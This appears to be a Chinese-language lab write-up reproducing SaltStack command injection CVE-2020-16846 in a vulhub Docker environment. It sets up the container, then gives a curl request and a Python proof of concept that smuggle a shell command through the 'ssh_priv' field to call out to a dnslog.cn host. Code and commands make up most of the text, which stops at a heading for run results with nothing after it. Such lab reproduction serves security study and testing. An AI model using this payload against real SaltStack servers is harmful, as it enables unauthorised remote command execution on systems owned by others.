环境搭建:
使用vulhub,进入对应文件夹启动环境:
[root@localhost ~]# cd /home/vulhub/saltstack/CVE-2020-16846/
[root@localhost CVE-2020-16846]# docker-compose up -d
查看端口:
[root@localhost CVE-2020-16846]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
0043f4957bd6 vulhub/saltstack:3002 "/usr/bin/dumb-init …" 6 seconds ago Up 5 seconds 0.0.0.0:4505-4506->4505-4506/tcp, :::4505-4506->4505-4506/tcp, 0.0.0.0:8000->8000/tcp, :::8000->8000/tcp, 0.0.0.0:2222->22/tcp, :::2222->22/tcp cve-2020-16846_saltstack_1
[root@localhost CVE-2020-16846]#
漏洞复现:
使用KALI向https://your-ip:8000/run发送如下数据包:
┌──(root💀kali)-[~]
└─# curl -v -sk -X POST https://192.168.10.10:8000/run \
-H 'Content-Type: application/json' \
-d '{"client":"ssh","tgt":"*","fun":"anything","eauth":"anything","ssh_priv":"/dev/null < /dev/null; curl erqqbd.dnslog.cn #"}'
POC编写:
import requests,random,time
requests.packages.urllib3.disable_warnings() #去除告警
url = "https://192.168.10.10:8000/run"
session = requests.session()
dnslog = session.get(f"http://www.dnslog.cn/getdomain.php?t={str(random.random())}").text # 获取一个子域名
headers = {
'Content-Type': 'application/json',
}
data = '{"client":"ssh","tgt":"*","fun":"anything","eauth":"anything","ssh_priv":"/dev/null < /dev/null; curl %s #"}'%dnslog
requests.post(url, headers=headers, data=data, verify=False)
time.sleep(2)
dnslog_res = session.get(f"http://www.dnslog.cn/getrecords.php?t={str(random.random())}").text # 获取这个子域名被请求的结果
if dnslog in dnslog_res:
print("CVE-2020-16846 存在")
pycharm运行结果: